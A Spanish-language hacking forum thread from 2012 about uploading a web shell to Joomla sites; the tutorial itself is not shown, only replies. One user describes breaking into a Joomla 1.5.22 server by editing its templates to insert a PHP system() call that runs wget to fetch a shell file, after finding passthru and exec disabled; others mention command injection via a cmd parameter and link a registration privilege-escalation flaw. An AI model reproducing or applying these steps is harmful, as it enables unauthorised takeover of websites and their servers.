Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: duff10 en Mayo 19, 2012, 04:33:45 PM

Título: Upload shell en Joomla
Publicado por: duff10 en Mayo 19, 2012, 04:33:45 PM
Buenas chicos soy: Duff eh estado en otros foros de informatica como en Diosdelared... les quiero compartir un tutorial que hice, espero les guste.. comenten



Título: Re:Upload shell en Joomla
Publicado por: ANTRAX en Mayo 19, 2012, 04:47:51 PM
Que buen aporte Duff!!
Segui asi man!
Título: Re:Upload shell en Joomla
Publicado por: Abnormality en Mayo 19, 2012, 07:21:18 PM
Buen aporte, me gusto mucho. Saludos!
Título: Re:Upload shell en Joomla
Publicado por: M1ndCr4ck en Junio 01, 2012, 12:37:36 AM
que gran aporte de mucha ayuda.
salu2 duff  ;D
Título: Re:Upload shell en Joomla
Publicado por: عя ҜΔŁĬ en Junio 27, 2012, 12:03:21 PM
Gracais por el tutorial, ya probe de dos formas, editando las plantilas y poniendo un uploader, y tambien con este método, pero al momento de subir el archivo me tira este error:

CitarNot Acceptable

An appropriate representation of the requested resource /administrator/index.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Qué podría hacer para solucionarlo? Saludos
Título: Re:Upload shell en Joomla
Publicado por: ANTRAX en Junio 27, 2012, 12:05:41 PM
Quizas la version que tenes instalada ya esta parcheada
Título: Re:Upload shell en Joomla
Publicado por: Cronos en Junio 27, 2012, 12:09:48 PM
Si, yo instale Joomla y quise tratar de subir una shell por el Panel de Administracion como si fuera una imagen. Igual como dice el tutorial este, pero al tratar de modificar la seccion para agregar extenciones. Esta por lo que vi ya ha sido parcheada. Porlomenos en la version que probe que era la 2.5
Saludos,, Cronos.-
Título: Re:Upload shell en Joomla
Publicado por: عя ҜΔŁĬ en Junio 27, 2012, 12:26:30 PM
Gracias por las respuestas, la versión que usa es la 1.5.22. Acabo de intentar meterle passthru en las plantillas, pero al poner index.php=cmd=uname -a no me tira nada, seguire probando haciendo inlude o algun consejo que me digáis...
Saludos

EDIT: ya subí la shell, para los que quieran saber cómo, van a editar plantillas, y meten el comando system: <?php system("wget http:\\shell.txt") ?>
El comando  passthru y exec estaba dessactivado en ese servidor, por eso tuve que usar system()
Saludos ;)
Título: Re:Upload shell en Joomla
Publicado por: Sanko en Junio 27, 2012, 03:23:03 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si, yo instale Joomla y quise tratar de subir una shell por el Panel de Administracion como si fuera una imagen. Igual como dice el tutorial este, pero al tratar de modificar la seccion para agregar extenciones. Esta por lo que vi ya ha sido parcheada. Porlomenos en la version que probe que era la 2.5
Saludos,, Cronos.-
La 2.5 tiene vulnerabilidad en el registro : http://underc0de.org/foro/bugs-y-exploits/escalada-de-privilegios-en-joomla-a-traves-de-un-registro-sanko/ (http://underc0de.org/foro/bugs-y-exploits/escalada-de-privilegios-en-joomla-a-traves-de-un-registro-sanko/)
Título: Re:Upload shell en Joomla
Publicado por: Dedalo en Junio 27, 2012, 08:18:46 PM
Excelente post :) muy útil.


http://underc0de.org/foro/bugs-y-exploits/shell-upload-en-conocidos-cms/


Saludos,
Dedalo
Título: Re:Upload shell en Joomla
Publicado por: Muppet en Junio 28, 2012, 12:07:19 AM
Buen Aporte, Nunca lo habia probado!
Sólo texto | Texto con Imágenes